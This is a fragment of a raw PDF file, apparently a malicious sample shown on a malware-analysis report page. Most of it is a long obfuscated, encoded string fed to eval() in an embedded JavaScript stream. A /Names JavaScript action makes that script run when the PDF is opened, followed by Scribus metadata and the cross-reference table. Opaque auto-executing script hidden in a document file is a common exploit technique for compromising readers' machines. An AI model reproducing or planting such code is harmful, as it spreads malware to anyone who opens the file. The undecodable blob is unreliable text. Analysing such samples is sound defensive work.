j_gs3tGRgfYQjeuKw_WADntHnH5QzHk0gCBQzeu@Df2OEHZQnXSbzyKO06G6wyKvTPgPwyKOa6vMwyKQGPEKwyK0a6obQyKvTPR6QyKVGPEMwyKvTP@0QyKQarKKwyKQwrPyQyK0a6obQyKva0GPwyKFGPvMwyKsarobQyKXwPG6QyKswPvPwyKsk60VwyKsk65bQyKsvPobQyK0T0PyQyKsT6KUQyKsQPo6wyKvwrKHwyKQaOK@wyKsGOKHwyKFG6obQyKvTPG6QyKOG6EPwyKQG6EKwyKsTO9OwyKFTOobQyKQG65MwyKOG69OwyK0wraRwyK0w6KMwyKOG6@0QyKOTO9XQyKyQ0RHQyKQG6pPwyKXk6GKwyKQarEPwyKOk0aVwyKQG6RPQyK0a69VQyKsk0PyQyKOTPKKwyKFwO9vwyKsw0PswyK0TOobQyKQG65PwyKXTOaOwyKQGPobQyKvTPvKwyKVGPKHwyK0v6R6wyKQaOobQyKQG6oUQyKsT0aOwyKsa6K@QyKva0aOwyKQarEPQyKsT6KtwyKOG6jvwyKvwPaVQyKs0rKbQyKXk0@ywyKXk09XQyKO06GbwyKXvOobQyKVQ09ywyKy0rvHQyKyw0g@wyKFarg@wyKXTO@yQyKXTOAKwyKOG6@yQyKy0raQwyKXaOgUwyKQa6RMwyKXarKMwyKXarKPwyKXwOEbwyKyaOG@wyKXwrp6QyKsa6EPwyKsG6KPwyKVQPjvwyKQa09OQyKXk0E6QyKQaOK@wyKX0robQyKO0Oo6wyKy06R6QyKvwPg6QyKRarPQwyKXarKMwyKXw0gHQyKXaO5@QyKFwOgKwyKXGPEbwyKsaOgPQyKvw0jvwyKQw0v@QyKXk0POQyKQaOK@wyKsa6A6wyKO06G6wyKsa6KMwyKvTPKHwyKQaOK@wyKOk6o6wyKvG6EHQyK0GPaywyKsa6KbwyKOTOjvwyKyT0pUQyKXk0EMwyKQaOK@wyKsGOKbQyKy0rKHwyKXQ0AKwyKQw0oUQyKswO9XQyKXwPRPwyKXk0RMwyKXar0FwyKFaOEPwyKOwPEMwyKyT05HQyKXwrgPQyKFT6g6wyKyw0gHQyKXwOgPwyKFa6g@wyKXT0gHwyKXT0EPwyKXwO5@QyKyT0E@wyKXT0g6wyKXw0E@wyKXwOEPwyKyT0EbwyKXa0gpwyKyw0gtwyKXarEMwyKOT0EMwyKXw6EMwyKXwOgtwyKOG6GPQyKFa6GHQyKXGOgUwyKOa0g@wyKQa6G@TbxATntHnH5Qzf2ugjZyDtZRdbJMLf2Fdb@yDtZRd_xATntHnH5Q5HTQzeuMa4R696TQGHR6grWpuFZydbZ09X5QzeuMa4vMa6RMa61JVngV3tu6EH_kcXYQzeuU9XkogCY2cXYF9FSQL_ubGrWpuFZydbNs3fuZabZ09X5QzmuK5tTSPf2Ng_RKE6op5rWpuFZydbAV3tGQdbJMzFYsgtTV9t2vLb2@nrRpa62@nrRpa6Lp5rWpV4ZyEtRQzeuHcCoSMCvvz4ZyEtRkjbNs3fxATntHnH5Q5HhsDfvyabJMj_TO9bqMj6o0a6RMa6Rp5mZ09X5oTn3S3tuKLFZydbTScFY0neRAGHhsDfvkGHhsDfvyGrTScFY0E_BpLn1IsbuMjbqscf_V3t5Vc4rOgfKN9FbQzeupnH5OdtuAjbZ09XBogrWZDntHnH5Q5fgs3t3kgfEQzeu@Df2OEHZQnXSbzyKQGHR6cyKQGHR63bxATnttdCxkcXSx3F2yDXNSgFY2cXYF9FSQjeuPaOA@T6xM5fgs3t3kgfEQ5_JM5fgs3t3kgfEoTntPdCxODmTS9fNV3Hw0Ef5s9bJM5Phk9fZy3mTS9fNsgHvsQfZR9ftN3Xhv54GsDH7IabLbjmqOEXlM5fgs3t3kgfEun_1JVWWJVC3Qj_gs3tGRgfYQjeupTmppznWpR4Wp3XuKzHRQDmkSgHY6vfNkcHLN5X20ndTS3fxADnuMjbuMLFZydbgXdt20dCAV9bJ@Df2OEHZQnXSbzyKO06G6wyKvTPgPwyKOa6vMwyKQGPEKwyK0a6obQyKvTPR6QyKVGPEMwyKvTP@0QyKQarKKwyKQwrPyQyK0a6obQyKva0GPwyKFGPvMwyKsarobQyKXwPG6QyKswPvPwyKsk60VwyKsk65bQyKsvPobQyK0T0PyQyKsT6KUQyKsQPo6wyKvwrKHwyKQaOK@wyKsGOKHwyKFG6obQyKvTPG6QyKOG6EPwyKQG6EKwyKsTO9OwyKFTOobQyKQG65MwyKOG69OwyK0wraRwyK0w6KMwyKOG6@0QyKOTO9XQyKyQ0RHQyKQG6pPwyKXk6GKwyKQarEPwyKOk0aVwyKQG6RPQyK0a69VQyKsk0PyQyKOTPKKwyKFwO9vwyKsw0PswyK0TOobQyKQG65PwyKXTOaOwyKQGPobQyKvTPvKwyKVGPKHwyK0v6R6wyKQaOobQyKQG6oUQyKsT0aOwyKsa6K@QyKva0aOwyKQarEPQyKsT6KtwyKOG6jvwyKvwPaVQyKs0rKbQyKXk0@ywyKXk09XQyKO06GbwyKXvOobQyKVQ09ywyKy0rvHQyKyw0g@wyKFarg@wyKXTO@yQyKXTOAKwyKOG6@yQyKy0raQwyKXaOgUwyKQa6RMwyKXarKMwyKXarKPwyKXwOEbwyKyaOG@wyKXwrp6QyKsa6EPwyKsG6KPwyKVQPjvwyKQa09OQyKXk0E6QyKQaOK@wyKX0robQyKO0Oo6wyKy06R6QyKvwPg6QyKRarPQwyKXarKMwyKXw0gHQyKXaO5@QyKFwOgKwyKXGPEbwyKsaOgPQyKvw0jvwyKQw0v@QyKXk0POQyKQaOK@wyKsa6A6wyKO06G6wyKsa6KMwyKvTPKHwyKQaOK@wyKOk6o6wyKvG6EHQyK0GPaywyKsa6KbwyKOTOjvwyKyT0pUQyKXk0EMwyKQaOK@wyKsGOKbQyKy0rKHwyKXQ0AKwyKQw0oUQyKswO9XQyKXwPRPwyKXk0RMwyKXar0FwyKFaOEPwyKOwPEMwyKyT05HQyKXwrgPQyKFT6g6wyKyw0gHQyKXwOgPwyKFa6g@wyKXT0gHwyKXT0EPwyKXwO5@QyKyT0E@wyKXT0g6wyKXw0E@wyKXwOEPwyKyT0EbwyKXa0gpwyKyw0gtwyKXarEMwyKOT0EMwyKXw6EMwyKXwOgtwyKOG6GPQyKFa6GHQyKXGOgUwyKOa0g@wyKQa6G@TbxATntMLFZydbSFMtKMa6aN0bJMLFgQnXvvc4ZNjf2NgXvv9b7ML61JVnuHnH5Qjf2N9bJMj6o0a6RMa6RMzmuKjCnVnORMGPfQ5_uMa4GKw_1JVnuHnH5Qz4ZyEtRQzeu@Df2OEHZQnXSbzyKRa6AMwyKRa6AMTbxATntMz4ZyEtRQzeuHcCoSMCvvz4ZyEtRkjbNs3fxATntMLFZydbRswP7okOKH9bJMj_RKd6TQGHR696TQzmuMa4vMa6RMa6xM5muMa4vMa6RMa61JsbuMjbuHgf5Qj_gV3tuHntTVP0AHw4uZabRAabgVEHU0QrgpdbIMjtKUkC4XwO3oabgVEHU0QrgpdbBAjbxADnuMjbuMzH5yn4rXntTVP0AHw4bQzeupnH5OdtuAjbgXdt20dCAVgrJIsbuMjbuHnH5QjFMu0Cfyg0EQzeu@Df2OEHZQnXSbzyRpTbxATnuMjbuM5FSR9f2Qj_vsM9SNkHdFDmNs3fD0dCu2abRKdORMa6xPnsHv39LFvFuAzeuPnsHv39LFvF1JsbuMjbuPnsHv39LFvFuZabLqkmLM5_uPnsHv39LFvF1JVnuU9tRNjXhO3maS9fNV3HYtcXvRvHhN9_vsM9SNkHdFn_1JVnJIVnJo" + ""));eval(BJeuy7);
endstream
endobj
14 0 obj
<</JS 13 0 R
/S /JavaScript
>>
endobj
10 0 obj
<</Names [(a) 14 0 R]
>>
endobj
15 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080726194358)
/CreationDate (D:20080726194358)
>>
endobj
xref
0 16
0000000000 65535 f
0000000015 00000 n
0000000412 00000 n
0000000204 00000 n
0000000249 00000 n
0000000342 00000 n
0000000322 00000 n
0000000373 00000 n
0000000756 00000 n
0000000564 00000 n
0000004736 00000 n
0000000430 00000 n
0000000511 00000 n
0000000822 00000 n
0000004689 00000 n
0000004777 00000 n
trailer
<</Info 15 0 R
/Root 1 0 R
/Size 16
>>
startxref
4978
%%EOF
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.